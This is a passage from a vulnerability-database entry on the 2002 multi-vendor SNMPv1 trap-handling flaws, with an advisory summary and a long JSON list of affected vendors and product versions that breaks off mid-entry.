Search

Find a vulnerability

Search criteria

    195 vulnerabilities by nortel

    VAR-200202-0006

    Vulnerability from variot - Updated: 2026-04-10 23:59

    Vulnerabilities in a large number of SNMP implementations allow remote attackers to cause a denial of service or gain privileges via SNMPv1 trap handling, as demonstrated by the PROTOS c06-SNMPv1 test suite. NOTE: It is highly likely that this candidate will be SPLIT into multiple candidates, one or more for each vendor. This and other SNMP-related candidates will be updated when more accurate information is available. Multiple vendor SNMPv1 Trap handling implementations contain vulnerabilities that may allow unauthorized privileged access, denial-of-service conditions, or unstable behavior . If your site uses SNMP in any capacity, the CERT/CC encourages you to read the information provided below. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ SNMP Protocol is status and performance information MIB (Management Information Base) Protocol used to exchange Management side SNMP Managers such as managed routers, switches and printers SNMP Communicates with management network devices called agents. Because of its wide acceptance in the market, SNMP Has become the standard for SNMP protocol version1 Is SNMPv1 Is the most widely implemented. this SNMPv1 Sent from the agent to the manager in the implementation of SNMP Trap message and sent from the manager to the agent SNMP Decrypt the request message / There are problems in interpreting. If this problem is used by an attacker, the following actions may be executed. Many other programs that you implement may also be affected because of a protocol problem. On the target host SNMP If the service is running, an attacker could execute arbitrary code ・ If a buffer overflow attack is feasible and a very long trap message SNMP If the host on which the service is running receives, the application may go into a denial of service state The effects described above vary from application to application. For details, refer to each product.Please refer to the “Overview” for the impact of this vulnerability. Windows 95 is prone to a denial-of-service vulnerability. MPE/iX is an Internet-ready operating system for the HP e3000 class servers. It is possible to crash the service by transmitting to it a maliciously constructed SNMPv1 request PDU. It was previously known as UCD-SNMP. They typically notify the manager that some event has occured or otherwise provide information about the status of the agent. Multiple vulnerabilities have been discovered in a number of SNMP implementations. The vulnerabilities are known to exist in the process of decoding and interpreting SNMP trap messages. Among the possible consequences are denial of service and allowing attackers to compromise target systems. These depend on the individual vulnerabilities in each affected product. HP has confirmed that large traps will cause OpenView Network Node Manager to crash. This may be due to an exploitable buffer overflow condition

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "3com",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "adtran",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "american power conversion",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "aprisma",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "bea",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "bmc",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "cnt",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "comtek services",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "cscare",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "cacheflow",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "carrier access",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "compaq computer",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "computer associates",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "concord",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "dart",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "dell",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "digital",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "entrada",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "equinox",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "f5",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "fluke",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "general datacomm",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "hirschmann",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "hitachi",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "iplanet",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "itouch",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "infovista",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "inktomi",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "innerdive",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "ipswitch",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "karlnet",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "lantronix",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "larscom incorporated",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "lotus",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "lucent",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "mg soft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "mandriva",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "marconi",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "mercury interactive",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "metrobility optical",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "micromuse",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "monfox",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "multinet",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "net snmp",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "network harmoni",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "nbase xyplex",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "netscout",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "netsilicon",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "netscape",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "network appliance",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "novell",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "openwave",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "optical access",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "perle",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "powerware",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "radware",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "red hat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "redback",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "riverstone",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "snmp research",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "sniffer",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "sonicwall",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "sonus",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "the sco group sco unix",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "tivoli",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "toshiba",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "unisphere",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "vertical",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "vina",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "wind river",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "world wide packets",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "xerox",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "e security",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "net com",
            "version": null
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "snmp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "snmp",
            "version": "*"
          },
          {
            "_id": null,
            "model": "windows 98se",
            "scope": null,
            "trust": 0.9,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "microsoft",
            "version": "95"
          },
          {
            "_id": null,
            "model": "windows server",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nudesign team",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "outback resource group",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "veritas",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "bintec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "interniche",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ncipher corp",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "netscreen",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nokia",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "2.6 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "2.6 (x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "7.0 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "7.0 (x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "8 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "8 (x86)"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "10.00"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "10.10"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "10.20"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.00"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.20"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "10.24"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.04"
          },
          {
            "_id": null,
            "model": "windows 2000",
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows 9x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "95"
          },
          {
            "_id": null,
            "model": "windows 9x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "98"
          },
          {
            "_id": null,
            "model": "windows 9x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "98 scd"
          },
          {
            "_id": null,
            "model": "windows 9x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "me"
          },
          {
            "_id": null,
            "model": "windows nt",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "4.0 (server)"
          },
          {
            "_id": null,
            "model": "windows nt",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "4.0 (terminal_srv)"
          },
          {
            "_id": null,
            "model": "windows nt",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "4.0 (workstation)"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "sp3"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "windows xp gold",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows nt",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hp",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hp",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hp",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hp",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hp",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hp",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ucd-snmp",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "net snmp",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "ucd-snmp",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "net snmp",
            "version": "4.1.1"
          },
          {
            "_id": null,
            "model": "ucd-snmp",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "net snmp",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "snmp",
            "scope": null,
            "trust": 0.6,
            "vendor": "snmp",
            "version": null
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "sunatm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "sunatm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "sunatm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "sunatm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "ucd-snmp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "net snmp",
            "version": "4.1.2"
          },
          {
            "_id": null,
            "model": "ucd-snmp",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "net snmp",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "solaris 8 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 8 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 7.0 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "solaris 2.6 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "enterprise server ssp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "100003.5"
          },
          {
            "_id": null,
            "model": "enterprise server ssp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "100003.4"
          },
          {
            "_id": null,
            "model": "enterprise server ssp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "100003.3"
          },
          {
            "_id": null,
            "model": "research mid-level manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "snmp",
            "version": "15.3"
          },
          {
            "_id": null,
            "model": "research enterpol",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "snmp",
            "version": "15.3"
          },
          {
            "_id": null,
            "model": "research dr-web manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "snmp",
            "version": "15.3"
          },
          {
            "_id": null,
            "model": "brocade",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "2.6.0"
          },
          {
            "_id": null,
            "model": "networks aos",
            "scope": null,
            "trust": 0.3,
            "vendor": "redback",
            "version": null
          },
          {
            "_id": null,
            "model": "realplayer intranet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "realnetworks",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "software tcpware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "process",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "software multinet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "process",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.5"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows xp professional",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp home",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows nt workstation sp6a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt workstation sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt workstation sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt workstation sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt workstation sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt workstation sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt workstation sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt terminal server sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt terminal server sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt terminal server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt terminal server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt terminal server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt terminal server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt terminal server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt server sp6a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt server sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt server sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt enterprise server sp6a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt enterprise server sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt enterprise server sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt enterprise server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt enterprise server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt enterprise server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt enterprise server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows nt enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "98"
          },
          {
            "_id": null,
            "model": "windows terminal services sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows terminal services sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows terminal services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
